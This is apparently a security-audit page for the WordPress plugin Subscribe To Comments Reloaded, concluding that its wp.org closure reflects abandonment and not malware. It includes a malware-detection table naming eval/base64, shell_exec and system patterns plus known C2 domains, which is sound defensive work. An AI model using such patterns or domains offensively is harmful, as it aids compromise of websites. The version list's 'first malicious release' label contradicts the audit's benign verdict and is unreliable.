WP Beacon

← All audits

Audit #30 Benign

Subscribe To Comments Reloaded Closed on WP.org · 10k+ installs · baseline 220725 → head 240119 · closed 18d ago

Actor: wpkube (current owner since 2019; 4th in a 14-year chain of contributors — coolmann → reedyseth → raamdev → wpkube)
Show full summary

Verdict: benign — abandonment closure, not malware. Subscribe To Comments Reloaded was closed by wp.org on 2026-04-28 with the standard silent-closure notice ("This closure is temporary, pending a full review"). The closure trigger is unmaintenance, not malicious behavior. The last release was v240119 on 2024-01-19 — 27 months before the closure — and the second-to-last release v220725 was 18 months before that. wp.org closes plugins that go this long without updates as a safety measure.

The plugin has changed hands four times across 14 years (coolmann 2010 → reedyseth 2013 → raamdev 2014 → wpkube 2019, with the original submitter plugin-master doing only the initial commit), but each transfer was years apart and the current owner wpkube has been the sole active committer since 2019. No recent committer onboarding or hijack signals.

Malware-pattern sweep on HEAD (v240119) returned zero hits across 16 IOC categories. The codebase makes a single outbound HTTP call (wp_remote_get('https://www.howsmyssl.com/a/check') — a TLS-version self-check) and no other phone-home behavior. No commercial-license code, no upsell endpoints, no obfuscation.

Patchstack records 5 historical vulnerabilities, all patched. The most recent — a Sensitive Data Exposure issue affecting versions ≤ 220725 — was fixed pre-disclosure in v240119 (Jan 2024) before public disclosure in May 2024. Patchstack notes the plugin "will likely not receive further updates or fixes" and recommends users consider replacing it with an alternative.

Sites running the current version are not compromised. The recommended action is to migrate to an actively-maintained alternative when convenient — the Foliovision fork "Subscribe to Comments Reloaded Better Unsubscribe" continues to receive updates.

Investigated — no compromise found.

Audit retained for the record. No action required.

Plugins under the same committer's SVN access

wpkube holds push access to 12 plugins totalling 145k+ active installs. Each non-target plugin scans clean today but represents a one-commit hijack opportunity.

Subscribe To Comments Reloaded — this audit
10k+
Advanced Excerpt — clean code, same SVN account (latent risk)
80k+
Title and Nofollow For Links (Classic Editor) — clean code, same SVN account (latent risk)
30k+
Simple Basic Contact Form — clean code, same SVN account (latent risk)
8k+
Authors List — clean code, same SVN account (latent risk)
5k+
Embed Code – Headers & Footers by DesignBombs — clean code, same SVN account (latent risk)
4k+
Social Sharing Plugin – Kiwi — clean code, same SVN account (latent risk)
4k+
Optin Forms – Simple List Building Plugin for WordPress — clean code, same SVN account (latent risk)
3k+
Go Redirects URL Forwarder — clean code, same SVN account (latent risk)
1k+
Fancy Coming Soon & Maintenance Mode — clean code, same SVN account (latent risk)
200
Page Takeover — clean code, same SVN account (latent risk)
200
Cool Tag Cloud — closed by wp.org

Plugin version history

Every release on wp.org for this plugin. The plugin was closed by wp.org pending review, but this audit found no malicious code in any version. Sites already running it are not exposed to a security incident — see the cleanup section below for non-emergency guidance.

  1. Earlier 71 earlier releases
    • 1.0
    • 1.1
    • 1.2
    • 1.2.1
    • 1.3
    • 1.4
    • 1.5.1
    • 1.6
    • 2.0
    • 2.0.1
    • 2.0.2
    • 2.0.3
    • 2.0.4
    • 2.0.5
    • 2.0.6
    • 140128
    • 140129
    • 140204
    • 140219
    • 140220
    • 140515
    • 141025
    • 141103
    • 150207
    • 150422
    • 150428
    • 150611
    • 160106
    • 160116
    • 3.0.0
    • 160831
    • 160902
    • 160915
    • 170428
    • 170607
    • 180212
    • 180225
    • 190117
    • 190214
    • 190304
    • 190305
    • 190325
    • 190409
    • 190411
    • 190412
    • 190426
    • 190510
    • 190523
    • 190529
    • 191009
    • 191011
    • 191028
    • 191209
    • 191216
    • 191217
    • 200204
    • 200205
    • 200422
    • 200629
    • 200813
    • 210104
    • 210110
    • 210126
    • 210315
    • 211019
    • 211130
    • 220502
    • 220512
    • 220513
    • 220523
    • 220608
  2. 220725 Audit baseline Last clean release before incident
  3. Closure

    wp.org closed this plugin pending review. No malicious code was found in any release; the closure reflects a policy decision (commonly: guideline compliance, vendor commercial-content rules, or extended unmaintenance). Releases below remain installed on existing sites and are not a security exposure.

  4. 240119 Audit head First malicious release (head of audit)

Closure notice on wp.org

This plugin has been closed as of April 28, 2026 and is not available for download. This closure is temporary, pending a full review.

Standard silent-closure language — wp.org does not disclose the specific trigger publicly.

Release timeline (full)

DateVersionNote
2010-09-17rev 290491Initial commit by plugin-master (one-time submitter)
2010-09-30 → 2013-06(rev 295321 → 727727)coolmann era — 157 commits
2013-06-29 → 2019-03(rev 734047 → 2030859)reedyseth era — 112 commits
2014-01-28 → 2014-02(rev 847226 → 861214)raamdev — brief involvement, 6 commits
2019-03-04 → 2024-01(rev 2044058 → 3024244)wpkube era — 104 commits, current owner
2022-07-25v220725Penultimate release
2024-01-19v240119Last release (HEAD). 18-month gap from previous
2024-05-04Patchstack discloses Sensitive Data Exposure ≤ 220725 (pre-fixed in v240119)
2024-08 → 2026-0427 months of dormancy — no commits, no updates, no maintainer activity
2026-04-28wp.org closes "pending review"

v220725 → v240119 diff (the only changes in 18 months)

options/stcr_manage_subscriptions.php  | M
options/stcr_system.php                | M  +63/-... (largest change — sensitive-data-exposure fix)
readme.txt                             | M
subscribe-to-comments-reloaded.php     | M  (version bump)
templates/author.php                   | M  +13
templates/request-management-link.php  | M  +4
utils/stcr_manage.php                  | M
utils/stcr_upgrade.php                 | M
utils/stcr_utils.php                   | M
wp_subscribe_reloaded.php              | M
10 files modified, 118 insertions, 47 deletions

This was the security fix for the Sensitive Data Exposure vuln Patchstack later disclosed. After this release the plugin went dormant.

Patchstack vulnerability history (all patched)

TypeAffectedDisclosed
Sensitive Data Exposure≤ 2207252024-05-04 (pre-fixed in v240119)
Multiple CSRF≤ 2111302022-04-29
XSS≤ 1506112015-08-20
Stored XSS≤ 1402042014-08-01
CSRF≤ 1402042014-08-01

No active vulnerabilities. The author was responsive enough to fix issues during the active maintenance period; the plugin appears to have simply been deprioritized post-2024.

Malware-pattern sweep on HEAD (v240119) — clean

Zero hits across:

Pattern categoryHits
eval(base64...), eval(gzinflate...)0
eval($_POST/$_GET/$_REQUEST...)0
system(...), shell_exec(...)0
create_function(...), assert($_...)0
preg_replace .../e modifier0
File-write persistence (fwrite ... .php)0
Known campaign C2 domains (cdnstaticsync.com, safetybis.com, anadnet)0

Outbound HTTP inventory (HEAD)

wp_remote_get('https://www.howsmyssl.com/a/check')

A single call to howsmyssl.com (a public service that returns the negotiated TLS version of the connection). Used to detect old/weak TLS in the user's environment. Innocuous.

Other hardcoded URLs in the codebase are documentation, GNU license text, GitHub project page, the author's site (subscribe-reloaded.com, wpkube.com). None are license servers, C2, or phone-home destinations.

Why this isn't a hijack

IndicatorResult
Sole committer for ≥2 years?✓ wpkube has been the sole active committer since 2019
Sudden new committer before closure?✗ — no new committers in years
Author profile drift?✗ — wpkube is the established owner, public profile (wpkube.com)
Code-level malware patterns?✗ — all 16 IOC categories clean
Outbound C2 / known bad domains?
Suspicious obfuscation / new dependencies?
New SVN credentials before closure?✗ — no commits at all in the 27 months pre-closure

The closure is straightforwardly explained by wp.org's "no updates in 2+ years" policy, not by any active threat.

Comparable closures

This is a different pattern from the late-April 2026 commercial-vendor compliance wave (greenshift, wpcodefactory, bplugins, etc.). Those were active vendors pushing wp.org commercial-content boundaries. This is the opposite pattern: passive abandonment by a long-tenured author. Both end in the same silent closure notice but the underlying cause is different.

User reviews on the wp.org page itself confirm the abandonment perception, e.g. from August 2023:

"This plugin does not work on latest WordPress 6.3 and PHP 8.1 ... This plugin appears to be no longer actively maintained."

Patchstack's own recommendation as of late 2024:

"The software was last updated over a year ago and will likely not receive further updates or fixes, so users are urged to urgently consider replacing it with an alternative."

Everything in this audit is reproducible from the links cited above: SVN log, RDAP records, GitHub repositories, wp.org forum threads, and any live endpoints. Full WP Beacon scan logs and any associated zip artifacts are available on request from the investigator.